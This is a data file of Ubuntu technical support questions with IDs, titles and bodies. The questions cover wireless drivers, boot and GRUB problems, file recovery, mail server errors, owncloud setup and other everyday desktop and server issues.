341376	file recovery after quick formatting	i have a dual system of windows 8 and ubuntu ( 12.04 , i think ) . i accidentally quick-formatted the linux partition using windows to ntfs , with the built-in formatting option . since it contained my grub installation , nothing boots anymore . is there a good recovery tool i could use from a ubuntu live disk ? will it be able to restore the file structure completely , that booting works immediately ( if nothing new was written to the partition ) , or is some structure needed to boot the system lost when quick-formatting and i am only able to restore select files before having to make a new installation ? i would be very happy for information on this , i never did data recovery and am afraid to destroy it . thanks in advance !
341377	my wireless bcm4311 card is not working for my laptop ?	i have recently installed ubuntu 12.04 and i am currently having problems with my wireless card as it does not seem to activate in additional drivers . according to lspci , my wireless card is broadcom bcm4311 802.11a/b/g ( rev 01 ) . when i try to activate the card in additional drivers an error message pops up telling /var/log/jockey.log . when i post /var/log/jockey.log into the terminal it says permission denied . please can someone help me get my wireless working through ubuntu ? p.s the wireless card works through windows 8 so the card is not faulty .
341379	dell inspiron 5520 15r 12.04 lts update	i installed ubuntu 12.04 ( with special driver support ) on my dell 5520 15r . this ubuntu image was recommended , as the system is ubuntu certified . the hardware is exactly as the link states . anyway , installation went fine , no problems there . however , after downloading and installing the latest updates , the system practically destabilized . the first thing i noticed was random system `` freeze-ups '' , after which i had to manually power off the pc ( hold power button ) next were the hdd as well as the external usb3.0 hdd which did n't spin down , nor power off ( not even -- detach would work ) . i reinstalled , did n't update and everything is working fine again . are system updates incompatible with this `` special '' ubuntu image ? will another update attempt yield the same results ? thanks in advance .
341393	ubuntu 12.04 server load installer components from cd	i tried to install ubuntu 12.04 server ( 64bit ) on a dell insprion n5520 using a usb stick . i used the universal-usb-installer-1.8.9.4 which has support for 12.04 server but you can also replicate the problem with linuxlive usb creator 2.8.11 or unetbootin 575 . the computer boots up the installation process ok . it gets through the ubuntu language , locale and keyboard selection . then starts loading additional components . at this point it gets about a quarter of the way through then throws big error message saying `` there was a problem reading data from the cd-rom . '' when i press no this error arise installation step failed . an installation step failed . you can try to run the following item again from the menu , or skip it and choose something else . the failing step is : load installer components from cd what should i do ?
341402	unable to get wireless to work 12.04 bcm4312 dell inspirion 1545	long story short , i was playing with things that i should n't have and had to do a fresh install of 12.04 . after going through how to install broadcom wireless drivers with no luck . then , became sort of tired of waiting for this to get updated ubuntu 12.04 on dell inspiron - wireless stopped working . also went through broadcom 4312 wireless issues [ duplicate ] . went through some other ones but i could n't find them again . i have nearly given up . this is definitely a duplicate in some form , but none of the other solutions have worked for me . right now i have uninstalled bcmwl-kernel-source and installed b43-fwcutter and firmware-b43-lpphy-installer . bellow is the info that seems to be popular $ lspci -nnk | grep -ia2 net 09:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8040 pci-e fast ethernet controller [ 11ab:4354 ] ( rev 13 ) subsystem : dell device [ 1028:02aa ] kernel driver in use : sky2 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 ) subsystem : dell wireless 1397 wlan mini-card [ 1028:000c ] kernel driver in use : b43-pci-bridge $ iwconfig wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . $ lsmod module size used by snd_hda_codec_idt 64649 1 joydev 17329 0 arc4 12509 2 snd_hda_intel 38819 3 snd_hda_codec 118613 2 snd_hda_codec_idt , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 85934 2 snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25157 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi b43 364596 0 i915 550346 3 snd_seq 51593 2 snd_seq_midi , snd_seq_midi_event bnep 17852 2 snd_timer 28931 2 snd_pcm , snd_seq drm_kms_helper 47749 1 i915 snd_seq_device 14137 3 snd_seq_midi , snd_rawmidi , snd_seq drm 233935 4 i915 , drm_kms_helper uvcvideo 72250 0 mac80211 541819 1 b43 coretemp 13324 0 rfcomm 38400 0 dell_wmi 12601 0 sparse_keymap 13658 1 dell_wmi gpio_ich 13278 0 bluetooth 211435 10 bnep , rfcomm snd 57014 15 snd_hda_codec_idt , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_t imer , snd_seq_device videobuf2_core 39385 1 uvcvideo videodev 96131 2 uvcvideo , videobuf2_core soundcore 12600 1 snd lpc_ich 17048 0 cfg80211 453853 2 b43 , mac80211 videobuf2_vmalloc 12920 1 uvcvideo videobuf2_memops 13042 1 videobuf2_vmalloc snd_page_alloc 18398 2 snd_hda_intel , snd_pcm parport_pc 27612 0 wmi 18744 1 dell_wmi dell_laptop 17209 0 i2c_algo_bit 13316 1 i915 ppdev 12849 0 psmouse 82769 0 serio_raw 13031 0 lp 17455 0 mac_hid 13077 0 dcdbas 14065 1 dell_laptop parport 40930 3 parport_pc , ppdev , lp bcma 39810 1 b43 microcode 18433 0 video 19116 1 i915 ums_realtek 17928 0 usb_storage 48053 1 ums_realtek sky2 53443 0 ssb 51554 1 b43 ahci 25631 2 libahci 26336 1 ahci $ rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no $ sudo dpkg -s firmware-b43-lpphy-installer package : firmware-b43-lpphy-installer status : install ok installed priority : optional section : contrib/kernel installed-size : 34 maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : all source : b43-fwcutter version : 1:015-9 depends : b43-fwcutter ( > = 1:015-9 ) , bzip2 , wget recommends : linux-image conflicts : firmware-b43-installer description : installer package for firmware for the b43 driver ( lp-phy version ) this package installs the firmware needed for usage of the b43 kernel driver . . supported chipsets : - bcm4312 ( with low-power aka lp-phy ) original-maintainer : fabrizio regalli < fabreg @ fabreg.it > homepage : http : //wireless.kernel.org/en/users/drivers/b43 $ dmesg | grep -e wlan -e b43 [ 9.914782 ] b43-phy0 : broadcom 4312 wlan found ( core revision 15 ) [ 9.956245 ] b43-phy0 : found phy : analog 6 , type 5 ( lp ) , revision 1 [ 14.216271 ] b43-phy0 : loading firmware version 478.104 ( 2008-07-01 00:50:23 ) [ 19.753302 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 19.755345 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready just another quick note . as i have it now , i am able to enable and disable wireless by clicking on the menu options on the top left . it seems like the wireless is working but it is not picking up any networks . would post a screenshot but it does n't take it if the menu is open : / . confirmed that wireless card is functional through windows boot . also double checked router with multiple devices . thanks in advance .
341406	private alternative to google docs ?	is there software to install on an ubuntu server , and then use to collaboratively edit text files , sometimes adding some attachments ? it 's important that no data is lost if 2 people save the same doc with different contents at the same time . i 've found seafile , but it seems too complicated considering it need 3 ports to work , and requires manual installation .
341410	libgmp3 not present	i need libgmp.so.3 to install ghc . however , installing libgmp-dev only installs libgmp.so and libgmpxx.so according to the installed files list . i have seen elsewhere people using symlinks , but this seems like a bad idea . i have these related questions : is this a bug in the ghc build or the ubuntu library ? in either case , i still need libgmp.so.3 . how can i obtain these library correctly ?
341413	how can i clear totem 's cache ?	i watched an uploaded movie with totem . looks like it saved or cached the movie somewhere because it takes space now from the hdd . i never noticed similar before . where does totem save streamed movies ?
341414	error when phablet-flash -b	i follow the instruction here http : //blog.desdelinux.net/como-instalar-ubuntu-touch/ . but when i try phablet-flash -b throw the follow error : traceback ( most recent call last ) : file `` /usr/bin/phablet-flash '' , line 22 , in < module > from phabletutils import arguments file `` /usr/lib/python2.7/dist-packages/phabletutils/arguments.py '' , line 23 , in < module > from phabletutils import cdimage file `` /usr/lib/python2.7/dist-packages/phabletutils/cdimage.py '' , line 25 , in < module > from phabletutils import fileutils file `` /usr/lib/python2.7/dist-packages/phabletutils/fileutils.py '' , line 20 , in < module > import lzma importerror : no module named lzma
341417	syncronisig and playing .m3u playlist files ?	i own a sony walkman mp3 player and run ubuntu 12.04 lts . i want to make playlist and put them onto my mp3 player . i can write my music to the player , but i ca n't seem to find where to put playlists on it . do i need to find a converter for this ?
341428	how to install flash player on ubuntu ?	even though i have the latest adobe flash player 11.2 for linux in firefox - ref : flash player security doubts - a particular online flash game still requests that i update to the latest flash player . i 've tried this online game on my laptop ( windows 8 with flash player 11.8 ) and it has no problems . is there a way to trick ubuntu or this game into thinking flash player 11.8 is `` installed '' ?
341436	comparing two dvds	how to compare two dvds ? i mean really a binary comparison ? the problem : i have two dvds containing a program , which should be the same . but i suspect one dvd to be modified . the sizes of the files and folders are the same , which does not mean that the content should be the same .
341438	postfix + sendmail ( rails ) : mail not being sent out	i have a rails app that is supposed to send out emails . it works on my other ubuntu server , but not on this one . here 's my mail.log in /var/log : sep 4 15:48:56 web2 postfix/qmgr [ 27071 ] : 18b6f8a8fb : from= < orders @ mysite-lehmann.com > , size=4447 , nrcpt=2 ( queue active ) sep 4 15:48:56 web2 postfix/qmgr [ 27071 ] : b84a78a8cf : from= < > , size=2844 , nrcpt=1 ( queue active ) sep 4 15:48:56 web2 postfix/qmgr [ 27071 ] : b1fa98a8e4 : from= < mysite.notifier @ mysite-lehmann.com > , size=14467 , nrcpt=1 ( queue active ) sep 4 15:48:56 web2 postfix/smtp [ 12151 ] : warning : per-session sasl client initialization : generic failure sep 4 15:48:56 web2 postfix/smtp [ 12151 ] : fatal : sasl per-connection initialization failed sep 4 15:48:56 web2 postfix/smtp [ 12153 ] : warning : per-session sasl client initialization : generic failure sep 4 15:48:56 web2 postfix/smtp [ 12153 ] : fatal : sasl per-connection initialization failed sep 4 15:48:56 web2 postfix/smtp [ 12152 ] : warning : per-session sasl client initialization : generic failure sep 4 15:48:56 web2 postfix/smtp [ 12152 ] : fatal : sasl per-connection initialization failed sep 4 15:48:57 web2 postfix/qmgr [ 27071 ] : warning : private/smtp socket : malformed response sep 4 15:48:57 web2 postfix/qmgr [ 27071 ] : warning : transport smtp failure -- see a previous warning/fatal/panic logfile record for the problem description sep 4 15:48:57 web2 postfix/master [ 1000 ] : warning : process /usr/lib/postfix/smtp pid 12151 exit status 1 sep 4 15:48:57 web2 postfix/master [ 1000 ] : warning : /usr/lib/postfix/smtp : bad command startup -- throttling sep 4 15:48:57 web2 postfix/error [ 12113 ] : 18b6f8a8fb : to= < lkies @ mysite.com > , relay=none , delay=84547 , delays=84546/1.1/0/0 , dsn=4.3.0 , status=deferred ( unknown mail transport error ) sep 4 15:48:57 web2 postfix/error [ 12113 ] : 18b6f8a8fb : to= < wilson @ mysite.com > , relay=none , delay=84547 , delays=84546/1.1/0/0 , dsn=4.3.0 , status=deferred ( unknown mail transport error ) sep 4 15:48:57 web2 postfix/qmgr [ 27071 ] : warning : private/smtp socket : malformed response sep 4 15:48:57 web2 postfix/qmgr [ 27071 ] : warning : transport smtp failure -- see a previous warning/fatal/panic logfile record for the problem description sep 4 15:48:57 web2 postfix/master [ 1000 ] : warning : process /usr/lib/postfix/smtp pid 12153 exit status 1 sep 4 15:48:57 web2 postfix/error [ 12113 ] : b1fa98a8e4 : to= < engineering @ mysite.com > , relay=none , delay=256639 , delays=256637/1.2/0/0 , dsn=4.3.0 , status=deferred ( unknown mail transport error ) sep 4 15:48:57 web2 postfix/qmgr [ 27071 ] : warning : private/smtp socket : malformed response sep 4 15:48:57 web2 postfix/qmgr [ 27071 ] : warning : transport smtp failure -- see a previous warning/fatal/panic logfile record for the problem description sep 4 15:48:57 web2 postfix/master [ 1000 ] : warning : process /usr/lib/postfix/smtp pid 12152 exit status 1 sep 4 15:48:57 web2 postfix/error [ 12113 ] : b84a78a8cf : to= < inquiries @ mysite-lehmann.com > , relay=none , delay=99654 , delays=99652/1.2/0/0 , dsn=4.3.0 , status=deferred ( unknown mail transport error ) i 'm really not familiar with postfix and how to configure it . i can telnet localhost 25 with no problem . can someone help me debug this ? let me know if you need more info .
341443	after downloading the .iso file , what do i do ?	i 'm trying to download ubuntu to be run alongside my current windows 8 platform . i downloaded the 64-bit version . what do i do now ? thanks
341447	compatibility of the trust flex design tablet with ubuntu	can anyone give me feedback about the compatibility of the trust flex design tablet with ubuntu ? i could n't find much useful information on the internet so far . especially , i wonder , whether the 1024 sensitivity-levels are working properly . i consider buying such a panel . any positive and negative experiences and issues are welcome !
341454	file-recovery in ubuntu	what are good software-solutions in recovering deleted files in ubuntu on ext3-/ext4- and ntfs-filesystems ? i 've been looking for diverse programs , but i could n't find good ones so far . tia
341455	bash does n't think lxc is installed , apt thinks it is	this screenshot sums up my problem : i 've run apt-get update , upgrade , purge , autoremove and then install again . no luck . anyone know why this is happening ?
341456	why does mouse cursor disappear with 13.04 under vmware ?	why does the mouse cursor disappear on the desktop in unity or gnome under 13.04 running in a virtual machine ( vmware fusion on a mac in my case ? ) all i did was to upgrade to 13.04 ... i 've been using ubuntu for a number of years ( and vmware fusion ) and i 've never seen such a persistent problem . i tried : reinstalling vmware tools gnome-tweak-tool unity-tweak-tool creating a new userid loading kubuntu desktop dpkg-reconfigure xorg and dpkg-reconfigure xserver-xorg nothing worked .
341459	kdm login will not accept username & password	i have just installed kde , set up my preferred environment ( with desktop cube effects color scheme , set the splash screen to `` minimalist '' and also installed ksnapshot . ) installation was done with the terminal , sudo apt-get install kde-desktop everything seemed to be working fine ( actually pretty stellar . ) then i did a reboot to make sure all my changes could settle-in properly . when i got back to the login screen , which is the kdm login screen i selected in the setup process , however , there seems to be no user account for me ( or anyone else for that matter . ) if i click `` switch user , '' my only option is something that says , `` unused ( :0 , vt8 ) '' which is already selected . if i type in my previous username and password , it wo n't recognize it and acts as though i 've typed in error . while i can not login , i do seem to have other options . the blue down-arrow gives me options of which desktop to use . options are '' defualt , '' '' kde plasma workspace , '' '' kde plasma workspace ( failsafe session ) , '' '' ubuntu , '' and '' failsafe . '' the red `` shutdown '' button on the screen gives me the options , '' switch user , '' '' restart x server , '' '' remote login , '' '' console login , '' and '' shutdown . '' would someone please help me get it functioning again ? it seems this has happened before . http : //ubuntuforums.org/showthread.php ? t=2003566 & highlight=kdm+username+password this person closed their thread before there were any responses , so i was n't able to post that i 'm having the same issue . the `` long-story short '' version of this is , kdm wo n't accept ( or seem to recognize the existence of ) my username or password , or any other , and i can not switch to another login manager to try that because that would require that it accept my credentials first . if it helps to know , before my reboot and subsequently getting stuck at kdm , lightdm logged me into kde just fine .
341463	virtualbox under ubuntu 12.04 has a problem in mounting an external usb-drive	i have installed virtualbox on ubuntu 12.04 64bit . now , i 've bought an external usb-drive with 1.5 tb . when i start windows7 in virtualbox and mount the new usb-drive , a popup-message appears , saying : `` usb device not recognized - one of the usb devices attached to this computer has malfunctioned , and windows does not recognize it . '' when i use the the usb-drive on windows7 without virtualbox , the drive works properly . when i start unbutu 12.04 in virtualbox and mount the new usb-drive , nothing happens . the new drive neither appears , nor an error-message is thrown . when i use the the usb-drive on ubuntu 12.04 without virtualbox , the drive works properly . when i use other usb-drives ( 2 x 250 gb ( usb2.0 ) , 1 x 500 gb ( usb2.0 ) , 1 x 1 tb ( usb3.0 ) ) and mount them in virtualbox they also work properly . tia
341464	regular login-screen sometimes replaced by a nonfunctional white text on black login-screen	i 'm running ubuntu 12.04.3 lts on a dell inspiron 1200 . most of the time when i power up the regular login-screen appears . sometimes a minimalist white text on a black screen appears . the screen requests my user id . when i have typed it in and pressed `` enter '' it requests my password . when i attempt to type it in the flashing cursor does not move and no dots appear . when i press `` enter '' i am notified that the login is incorrect . all i can do is hold the power button down and start over . generally , the second attempt works . my hard drive is the original . is it time for a new one or do i have a motherboard issue ? or has the software become corrupted ?
341465	installed both ubuntu 12.04 and solydx but no grub menu	i recently downloaded both isos of ubuntu 12.04 and solydx os and played the live image and then installed with my hard drive partitioned for both of them . my problem is that i look at disc management under windows 8 , and all of the partitions assigned for the os 's say 100 % free space and when i boot up , there is no grub menu . can it be that my laptop has the haswell processor which meant new motherboard , or can it mean something else ?
341467	ubuntu 12.04 printer unavailable when connecting to wifi	i have a xerox phaser 4510 printer that works fine when i connected it by ethernet in ubuntu 12.04 . however , when i switched to wifi , i can not print even the test page though i can connect to the printer ( ping is ok ) . by the way , it does work when i print on windows 7 , no matter i use wired or wireless network . so did anyone experience this situation before ? is it caused by mis-configuration or just a bug of ubuntu ? thanks for your help !
341468	bootmanager does not detect either pre-installed windows 8 or ubuntu after grub installation	i am new to linux . i installed ubuntu for the first time on a pre-installed windows 8 dell inspiron pc by creating a partition ( volume shrink through windows computer management ) . i created three partitions : a boot , a root and a swap . i followed the instructions for a uefi system and everything went fine . however , i later installed grub as well in order to be able to choose between the two operating systems during startup . the first time i rebooted , grub functioned properly . however , afterwards not only did it not work anymore , but also the windows boot loader can not detect either operating system anymore . when i boot , a media check appears and it fails twice . then i get a message saying 'no bootable device ' . i do not have a windows 8 cd so i am trying to fix the problem through the ubuntu live usb . since both os 's are where they should be ( i know by checking the gpt partition table through 'parted ' and running a bootinfo script ) , it seems to be the case that grub has messed up the windows boot files ( by overwriting them on the efi boot partition ) . how can i restore the windows boot loader without the installation cd of windows 8 ? i have read a lot of similar threads online but have found no effective solution without using the windows 8 cd . could anybody help please ? thanks .
341469	how to add virtual ram on ubuntu	i was just trying to play some games on ubuntu with a 2 gb ram and it does not run very well . is there any way i could add virtual ram from a flash drive ?
341473	remove output from add-apt-repository	i 'm trying to write a shell script that will automatically set-up a lamp stack for me . one of the lines i have in the script is : add-apt-repository -y ppa : ondrej/php5-oldstable > > /tmp/output.txt but try as i may it always outputs the following content : gpg : keyring `/tmp/tmpf0k2tr/secring.gpg ' created etc ... ... .. i would like there to be no output to be displayed to the screen when i run this command to add this ppa to my repository .
341478	save packages and ppa list since system install	i 'm going to change from 32 to 64 bit , there 's anyway i can save a list of added ppa 's and installed packages since first boot ? i 'm using ubuntu 12.04 .
341488	using putty to control server while port 22 is blocked	i can control my server command line using putty on my home network ( port 22 ) . i can also do this remotely ( port 22 ) . now the issue is that while i am at school , port 22 is blocked on the router so i can not access the server while i am there . i was wondering if there is a way to have putty use a different port ( 443 , 80 , etc ) so that i can control my server command line while i am at school . will i be able to have putty use port 443 at school ( outgoing connection ) and then connect to port 22 on my home router ?
341501	maximize windows to full screen in gnome classic	hi i would like to know if it is possible to maximize the windows to enter a full screen mode ( covering the panels in gnome classic ) . i would like to simulate the `` enter full screen '' option available for various browsers ( e.g . firefox or chrome ) , but for general windows . is there a way to do this ?
341502	how to fix error ata1.00 : failed to enable aa ( 0x1 = error_mask	automated translation i tell them that i have a laptop lenovo z 480 and half of the time ubuntu will not boot , only displays this error message error ata1.00 : failed to enable aa ( error_mask = 0x1 and sometimes the screen goes black with blinking cursor . is there any solution ? 've tried several distros ( kde and gnome and always equals the start and end times others do not . all use the grub 2 , the only distro that starts 100 % all the time is mageia not if using the old grub but it is very annoying not to be able to use the distro that you like best . como solucionar error ata1.00 : failed to enable aa ( error_mask = 0x1 les cuento que tengo un portatil lenovo z 480 y la mitad de las veces ubuntu no inicia , solo muestra este mensaje de error error ata1.00 : failed to enable aa ( error_mask = 0x1 y a veces se queda negra la pantalla con el cursor titilante . 驴existe alguna soluci贸n ? he probado varias distros ( kde y gnome y siempre es igual a veces termina el inicio y otras no . todas usan el grub 2 , la unica distro que inicia 100 % todas las veces es mageia no se si por que usa el grub antiguo pero es muy molesto no poder usar la distro que mas te gusta .
341504	conky error with gcalcli	trying to get conky to show my google calendar on my desktop . however , whenever i try to run conky this is my output : : traceback ( most recent call last ) : file `` /usr/bin/gcalcli '' , line 1524 , in < module > bowchickawowwow ( ) file `` /usr/bin/gcalcli '' , line 1471 , in bowchickawowwow gcal.calquery ( args [ 0 ] ) file `` /usr/bin/gcalcli '' , line 1011 , in calquery self._graphevents ( cmd , start , count , eventlist ) file `` /usr/bin/gcalcli '' , line 712 , in _graphevents printmsg ( clr_nrm ( ) , line + `` \n '' ) file `` /usr/bin/gcalcli '' , line 239 , in printmsg sys.stdout.write ( unicode ( msg , 'utf-8 ' ) ) typeerror : decoding unicode is not supported not sure why it 's telling me that unicode is n't supported , but here is my conky.rc ( also of note this is my first time using conky ) alignment top_right background no border_width 0 cpu_avg_samples 2 default_color white default_outline_color white default_shade_color white draw_borders no draw_graph_borders yes draw_outline no draw_shades no use_xft yes xftfont dejavu sans mono : size=12 gap_x 5 gap_y 60 minimum_size 5 5 net_avg_samples 2 double_buffer yes out_to_console no out_to_stderr no extra_newline no own_window yes own_window_class conky own_window_type override own_window_transparent yes own_window_hints undecorated , below , sticky , skip_taskbar , skip_pager stippled_borders 0 update_interval 1.0 uppercase no use_spacer none show_graph_scale no show_graph_range no text_buffer_size 8096 text $ { execi 300 gcalcli -- nc -- cals=owner calw }
341508	how can i prevent virtualbox from changing the permissions on the .vbox file ?	i 'm currently running ubuntu 13.04 , and i 've got a windows 8 virtualbox vm installed . i put the vm 's folder in a shared folder ( /home/sharedhome/ ) that has read and write permissions assigned to the vboxusers group . this allows me to launch the vm from my account and my wife can launch it from hers . the only problem is that when you launch the vm from either account , the permissions get changed so that only that user has read and write privileges on the .vbox file . after this happens , the other account ca n't launch the vm unless i go in and change the permissions again . does anyone know how to prevent virtualbox from changing the permissions ? is there a better way to share a vm between users ? thanks !
341511	need library libgthread-2.0 / found lib , now getting 'wrong elf class : elfclass64 '	trying to run a teamspeak client , getting : ./ts3client_linux_x86 : error while loading shared libraries : libgthread-2.0.so.0 : can not open shared object file : no such file or directory libgthread does n't seem to be included in glibc anymore , i ca n't change versions of the package - too much depends on it , anywhere i can get my mitts on this file/build this file ?
341522	beyond the sword just run into a black screen , how can i fix it ?	i have problem on my ubuntu 12.04 with civilization iv : bts . i installed civilization iv : complete using playonlinux . civ4 and dlc warlords work out of box , but latest dlc does not . when i run it , black screen appears , i hear music theme , and i see the cursor . game does n't crash . on arch linux the game runs well with the same configuration and the same version of wine . any ideas ? may it be caused by hybrid graphic cards on my laptop ? i have latest drivers installed
341528	two finger touchscreen gestures on ubuntu 13 ?	ubuntu worked with my new touchscreen enabled notebook ( dell inspiron 14r ) out-of-the-box , which was a pleasant surprise . but it seems to have only three and four finger gestures , as hinted here : https : //wiki.ubuntu.com/multitouch but the most common patterns like pinch to zoom , or two-finger scrolling are absent ( maybe a legal issue ? are those patented ? ) . i have the two-finger scrolling gesture correctly working in my trackpad . i saw some videos of people using ginn to add this kind of gestures . i installed ginn from the repositories with apt-get , but when i try to run it i get a error subscribing to gestures . did anyone around managed to make something like this work ? any pointers on why ginn is not loading ? thanks .
341529	is it possible to install ubuntu and lubuntu so that their basic programs are separate but they share programs installed after the main installation ?	i was wondering if it is possible to install ubuntu and lubuntu so that their basic programs are separate but they share programs installed after the main installation of them both and they share a home folder . i thought it might be possible through use of partitioning but have yet to figure out how .
341535	i want to use xmodmap along with multiple layouts	i usually use 3 keyboard layouts : us , bg , de . as i need the de layout only for umlaute , i found the solution with modifying the keys in ~/.xmodmap . the command xmodmap ~/.xmodmap changes my us layout in the desired way . but it has a side effect , it also changes my bg layout - the euro sign is the default sigh for the key e. how can i apply the command only for the us layout ?
341536	how can i run owncloud ?	i am getting a weird error from owncloud , and the documentation is n't helping nor are the forum topics . i 'm on ubuntu 13.10 but that should n't affect anything ( nothing different between it and 13.04 that should cause this ) . what is this config directory and what do i need to do to give owncloud access ?
341537	can anyone give me a list of commands i can enter in the terminal ?	i am trying to understand ubuntu more and i want to know more commands . can anyone give me a list of everyday use ones ? i would be super happy to learn anything else about ubuntu too ! thanks !
341543	help ! i get the wrong screen size after install the nvidia driver	my screen always flash when i right-click the gnome-terminal , so i wonder whether i have n't install the right drive . so i run the fallowing command : sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current after that , i reboot the system , but i got the wrong screen size , only 640*480 what can i do to rescure my system ?
341548	how can i use another drive with owncloud ?	i have owncloud installed and working , but i want it to use my secondary hard drive as opposed to the drive i have ubuntu installed on . how is this possible ? the documentation is rather confusing and outdated ( i 'm using owncloud 5 ) .
341560	how do i set up qjackctl without using the terminal ?	i can now open qjackctl using the terminal . this is the code that i am using . pulseaudio -- kill jack_control start this will open the program successfully . then when i am finished i can type this code : jack_control exit pulseaudio -- start it takes a little bit of typing , but it works . how do i save the commands and make it work automatically ? thanks in advance for all of your help .
341562	but seriously , how does one go about creating an internet shortcut within a folder in ubuntu lts 12.04	does anyone out there know how to create an internet shortcut within a folder ? i do n't mean to be picky here but the shortcut should have these properties : it has to work . it has to be searchable within the dash and the icon has to show up with it . that 's pretty much it . i 'm using ubuntu 12.04 and google chrome version 29.0.1547.65 . thanks for the support .
341563	how to check whether a file is in current directory or subdirectory	i use find to search for files in a directory and its subdirectories . find . -iname '*.csv ' , and it gives me the following output ./2012/t1.csv ./2012/t2.csv ./2013/t1.csv now , i want to check in a script whether the file t1.csv is in the current folder or in one of the subdirectories . if its in a subdirectory , my script should descend to that directory . how can i do that ?
341568	do updates run in the background on ubuntu 13.04 ?	when i was using an older version of ubuntu , i used to see new updates installing all the time . on 13.04 i 'm not sure if i was ever prompted for an update at all . however , there are settings like `` display immediately '' or `` display weekly '' , so i assume i 'm supposed to see when new updates are available . as far as i can tell , automatic updates are configured correctly . thank you
341569	using gedit in ubuntu	i use gedit for files that i also need in windows . for the files , i use the windows-1250 code page . in the ubuntu , i paste texts and sometimes after that i can not save the file in the 1250 code page . i wish to continue editing such file opened with the windows-1250 encoding , but to display it in a way that shows the characters that i need to correct ( manually ) to be able to save the file in the desired code page . i have seen such displaying for other files , where the `` bad '' character is displayed as a 4 numbers square table , but i can not achieve such displaying intentionally . is it possible ? how ? thanks .
341572	about wine hq and direct x 9	i am using the recent version of wine.i want to know that , should i install direct x9 to install games like sand andreas ( gta ) ... . , or not ? does wine initially contain direct x 9 ?
341575	how to avoid mouse editing in gedit	i am not used to edit text by mouse , i mean to use 'drag-and-drop text editing ' . in gedit 3.4.1 : i am used to select a part of text by clicking and moving the mouse . but i wish to avoid moving the selected part of text by further clicking at it and moving the mouse . ( i have not installed any gedit plug-in . ) in microsoft program options , there usually is a check box if to 'use the drag-and-drop text editing ' . i do not see such a setting in gedit . in the gedit , is it possible to disable the drag-n-drop editing ? how ? thanks .
341577	how to write post install script for my debian package	i want to configure my application for the first time soon after i install it . in debian folder of my application generated by dh_make i found postinst.ex . if this is the file i am looking for then where should i add post install code . there are 3 case blocks , configure , abort-upgrade|abort-remove|abort-deconfigure and * . the line i want to run post install is $ ( my_application_name ) -i what are the global variables available in postinst.ex script ? i am looking for a variable something like $ ( my_apllication_name )
341584	how to run mysql command from terminal ?	i have the following sql command which i usually run in phpmyadmin by selecting the database , then running it in the command window . delete from `wp_posts` where `post_type` = `` attachment '' however i 've never done this via terminal before . my question is , how do i `` point '' this command to a specific database and then running it ? thanks
341588	secure openerp server	i use a ubuntu 12.10 desktop as a server 'only ' for openerp 7.0 . this openerp server is used by both , the team as well as clients . i 've checked out posts that help someone secure a 'web-server ' ( i.e a lapm one ) . what i need is : how to keep the system secure ( from external threats and internal [ do n't tell me you have n't heard of nasty team-members who sabotage stuff when pissed off ] too ) ? how do i keep the openerp server secure ? how to allow web-access to the openerp server 'only ' through a proxy & secure the route . how to backup nightly to a nas ? the server also 'transmits ' data through another port ( other than the openerp one ) . how do i add it to the proxy , etc too so that it can be accessed from the web ( with or without auth ) ? would it be safe to use it as a print-server too ? if yes , what should be the config ? i understand it 's a very long one , i thought it 'd be better to list everything at a single place . p.s . if you insist , i 'm ready to run distro-upgrade ( to 13.04 ) via terminal so that i do n't lose any of my current data or settings .
341590	disable hibernation	as simple as it sounds i can not disable hibernation . i have disabled any gui option to disable hibernation but my acer aspire one has decided to start hibernating after an hour . when i first installed 12.04 on this machine i followed a tutorial to get get the suspend function working and i may have fiddled with hibernation settings as well . the real clanger to all this is hibernation does n't work on my machine so if it hibernates i must hard reboot ( holding down the power ky for 5 seconds ) to boot up my machine i don ; t know where to look for what might be starting the hibernation , and can not find the tutorial i used in the first place . contents of fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=72a8eda3-4259-4aed-a46e-32ca05f391c0 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation # uuid=0bcc2ac9-037f-43c3-81cb-53e0c3ad68e2 none swap sw 0 0 /dev/mapper/cryptswap1 none swap sw 0 0 # move /tmp to ram tmpfs /tmp tmpfs defaults , noexec , nosuid 0 0 gparted screenshot http : //i.stack.imgur.com/svdrm.png output of ls -l /dev/disk/by-uuid/ total 0 lrwxrwxrwx 1 root root 10 sep 5 15:45 0f9e0837-2ab4-429b-9c5e-81c156ae8197 - > ../../dm-0 lrwxrwxrwx 1 root root 11 sep 5 15:45 199020ec-61c3-4be3-aabf-0635a8b2994c - > ../../zram0 lrwxrwxrwx 1 root root 10 sep 5 16:09 28aa883baa880810 - > ../../sda2 lrwxrwxrwx 1 root root 10 sep 5 16:08 509459c89459b168 - > ../../sdb1 lrwxrwxrwx 1 root root 10 sep 5 16:09 588833e18833bc76 - > ../../sda1 lrwxrwxrwx 1 root root 10 sep 5 15:45 72a8eda3-4259-4aed-a46e-32ca05f391c0 - > ../../sda6
341594	vi /etc/network/interfaces no such file or directory	when i install initial configuration in ubuntu 12.04 server , i type this command to change the network interface card ( nic ) from using dhcp to a static ip : vi /etc/network/interfaces out put is : vi /etc/network/interfaces no such file or directory should i create this directory or what ?
341602	i have problem while installation with packages	this is the error while installing packages : dpkg : error processing crossplatformui ( -- configure ) : subprocess installed post-installation script returned error exit status 2
